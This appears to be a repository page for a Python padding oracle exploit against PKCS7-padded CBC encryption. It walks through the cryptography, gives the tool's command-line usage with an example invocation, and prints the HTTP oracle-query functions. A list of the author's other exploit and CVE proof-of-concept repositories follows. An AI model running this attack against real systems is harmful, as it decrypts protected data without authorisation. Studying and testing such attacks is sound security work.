• Stars
    star
    316
  • Rank 129,390 (Top 3 %)
  • Language
    Python
  • License
    MIT License
  • Created over 8 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

πŸ”“ Padding oracle attack against PKCS7 πŸ”“

Padding Oracle Attack

An exploit for the Padding Oracle Attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of this great article Padding Oracle Attack. Since the article is not very well formated and maybe unclear, I made an explanation in the readme. I advise you to read it if you want to understand the basics of the attack. This exploit allows block sizes of 8 or 16. This means it can be used if the cipher uses AES or DES. You can find instructions to launch the attack here.

I also made a test file test.py, you don't need a target to use it :)

Explanation

I will explain in this part the cryptography behind the attack. To follow this you need to understand the CBC mode cipher chainning or video link and the operator βŠ•. This attack is also a chosen-ciphertext attack.

Encryption Decryption
Ci = Ek(Pi βŠ• Ci-1), and C0 = IV Pi = Dk(Ci) βŠ• Ci-1, and C0 = IV

In CBC mode we also need a padding in the case the length of the plaintext doesn't fill all the block. For example we can have this plaintext and the following padding if the length of the block is 8 :

S|E|C|R|E|T| |M|E|S|S|A|G|E|02|02

You can notice the length of SECRET MESSAGE is 14 so we need to fill two blocks of CBC equal 16. There are two bytes left, this is where the padding step in. You can see the two last byte 0202. Another example, if the padding had a length of 5, it will be fill with 05|05|05|05|05. Of course there is different way to fill the padding but in our case like most of the case the standard is PKCS7 for the padding block.

If the padding does not match the PKCS7 standard it will produce an error. Example :

S|E|C|R|E|T| |M|E|S|S|A|G|E|03|03

When the block will be deciphered there will be a verification to check if the padding is good or not :

S|E|C|R|E|T| |M|E|S|S|A|G|E|03|03 => Wrong padding
S|E|C|R|E|T| |M|E|S|S|A|G|E|02|02 => Good padding

Now imagine we can know when we have a bad padding and a good padding (the server send an "error padding" or "404 not found" when the padding is wrong etc). We will call this our Oracle. The answers he will give us will be :

  • good padding
  • bad padding

Now we know that, we can construct a block to retrieve one byte of the plaintext, don't forget this is a chosen-ciphertext attack. An attacker will intercept a cipher text and retrieve byte by byte the plaintext.

  • intercepted cipher : C0 | C... | Ci-1 | Ci
  • then build a block like this :

C'i-1 = Ci-1 βŠ• 00000001 βŠ• 0000000X | Ci

Where X is a char between chr(0-256).

  • then he sends C'i-1 | Ci to the oracle. The oracle will decrypt like this :

Dk(Ci) βŠ• C'i-1
= Dk(Ci) βŠ• Ci-1 βŠ• 00000001 βŠ• 0000000X
= Pi βŠ• 00000001 βŠ• 0000000X

Now there is two possibilities: a padding error or not :

  • if we have a padding error :
If P'i βŠ• 0000000Y == abcdefg5 then:
    abcdefg0 βŠ• 00000001 = abcdefg5

This is a wrong padding, so we can deduce the byte Y is wrong.

  • The oracle didn't give us a padding error and we know the byte X is good :
If Pi βŠ• 0000000X == abcdefg0 then:
    abcdefg0 βŠ• 00000001 = abcdefg1

For the second byte :

C'i-1 = Ci-1 βŠ• 00000022 βŠ• 000000YX | Ci

And then :

Dk(Ci) βŠ• C'i-1
= Dk(Ci) βŠ• Ci-1 βŠ• 00000022 βŠ• 000000YX
= Pi βŠ• 00000001 βŠ• 00000YX

  • The oracle didn't give us a padding error and we know the byte X is good :
If Pi βŠ• 000000YX == abcdef00 then:
    abcdef00 βŠ• 00000022 = abcdef22

etc etc for all the block. You can now launch the python script by reading the next section :)

Protection

Options

The test file if you don't have target :

python test.py -m mysecretmessage

The exploit :

usage: exploit.py [-h] -c CIPHER -l LENGTH_BLOCK_CIPHER --host HOST -u
                  URLTARGET --error ERROR [--cookie COOKIE]
                  [--method METHOD] [--post POST] [-v]

Details required options:

-h help
-c cipher chain
-l length of a block example: 8 or 16
-u UrlTarget for example: ?/page=
--host hostname example: google.fr
--error Error that the oracle gives you for a wrong padding
    example: with HTTP method: 200,400,500
             with DOM HTML   : "<h2>Padding Error</h2>"

Optional options:

--cookie Cookie parameter example: PHPSESSID=9nnvje7p90b507shfmb94d7
--method Default GET method but can set POST etc
--post POST parameter if you need example 'user':'value', 'pass':'value'

Example:

python exploit.py -c E3B3D1120F999F4CEF945BA8B9326D7C3C8A8B02178E59AF506666542AB5EF44 -l 16 --host host.com -u /index.aspx?c= -v --error "Padding Error"

Customisation

I wan to customize the Oracle !

Example with sockets https://gist.github.com/mpgn/fce3c3f2aaa2eeb8fac5

No problem, find these line and do what you have to do :)

  • Custom oracle response:
#######################################
# CUSTOMIZE YOUR RESPONSE ORACLE HERE #
#######################################
''' The function you want change to adapt the result to your problem '''
def test_validity(response,error):
    try:
        value = int(error)
        if int(response.status) == value:
            return 1
    except ValueError:
        pass  # it was a string, not an int.

    # oracle repsonse with data in the DOM
    data = response.read()
    if data.find(error) == -1:
        return 1
    return 0
  • Custom oracle call (HTTP)
###################################
# CUSTOMIZE YOUR ORACLE HTTP HERE #
###################################
def call_oracle(host,cookie,url,post,method,up_cipher):
    if post:
        params = urllib.urlencode({post})
    else:
        params = urllib.urlencode({})
    headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain", 'Cookie': cookie}
    conn = httplib.HTTPConnection(host)
    conn.request(method, url + up_cipher, params, headers)
    response = conn.getresponse()
    return conn, response

More Repositories

1

BackupOperatorToDA

From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller
C++
378
star
2

Spring-Boot-Actuator-Exploit

Spring Boot Actuator (jolokia) XXE/RCE
Java
316
star
3

poodle-PoC

🐩 Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 🐩
Python
243
star
4

CVE-2019-0192

RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl
Python
212
star
5

ByP-SOP

πŸ΄β€β˜ οΈ Bypass Same Origin Policy with DNS-rebinding to retrieve local server files πŸ΄β€β˜ οΈ
HTML
194
star
6

CVE-2019-5418

CVE-2019-5418 - File Content Disclosure on Ruby on Rails
192
star
7

CVE-2019-19781

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit
Python
157
star
8

CVE-2019-7238

πŸ±β€πŸ’» Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution πŸ±β€πŸ’»
Python
151
star
9

Rails-doubletap-RCE

RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
Ruby
134
star
10

discord-e2e-encryption

πŸ”‘ Tampermonkey script that encrypt and decrypt your messages on Discord πŸ”‘
JavaScript
86
star
11

heartbleed-PoC

πŸ’” Hearbleed exploit to retrieve sensitive information CVE-2014-0160 πŸ’”
Python
77
star
12

BEAST-PoC

πŸ’ͺ Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 πŸ’ͺ
Python
67
star
13

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
59
star
14

CVE-2019-7609

RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
51
star
15

CVE-2019-9580

CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
HTML
32
star
16

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
32
star
17

astudiaeth

Master CSI
TeX
28
star
18

CRIME-poc

πŸ”ͺ CRIME attack PoC : a compression oracle attacks CVE-2012-4929 πŸ”ͺ
Python
28
star
19

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
Python
25
star
20

ntlmrelayx-prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
22
star
21

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE
Python
17
star
22

HallOfFame-Root-me.org

πŸ’€ Root-me Hall Of Fame dashboard πŸ’€
Python
15
star
23

DllInjectExec

πŸ’‰ Dll injection for executable file πŸ’‰
C++
14
star
24

Slanger-RCE

RCE in Slanger using deserialization of Ruby objects
Python
12
star
25

CVE-2018-3760

Rails Asset Pipeline Directory Traversal Vulnerability
9
star
26

ropycat

Scripts that allow you to copy/past text into another Windows process to bypass Citrix copy/paste limitation
C#
9
star
27

CVE-2019-9978

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3
9
star
28

discourse-cookie-token-domain

πŸͺ Allow to setup cookie token to authenticate user πŸͺ
Ruby
8
star
29

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6
Python
7
star
30

ShareP0wn

ShareP0wn
Python
7
star
31

YTC-ID

πŸ“Œ Get the YouTube channel ID ! πŸ“Œ
HTML
5
star
32

DllInjectService

πŸ’‰ Dll ready to be injected into a service πŸ’‰
C++
5
star
33

copper-jekyll-theme

Copper Jekyll theme - simple and useful
CSS
5
star
34

docker_dashboard

Python
4
star
35

impacket-cme

Python
2
star
36

swindle

Swindle is a project for YouTube Network
PHP
2
star
37

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Python
2
star
38

Ipsum

Small app for YouTube Network. Get a free submit form for YouTube Channel who want join your network. With AngularJS
JavaScript
1
star
39

Pyrox

For Youtube Network with YouTube API V3 Public
PHP
1
star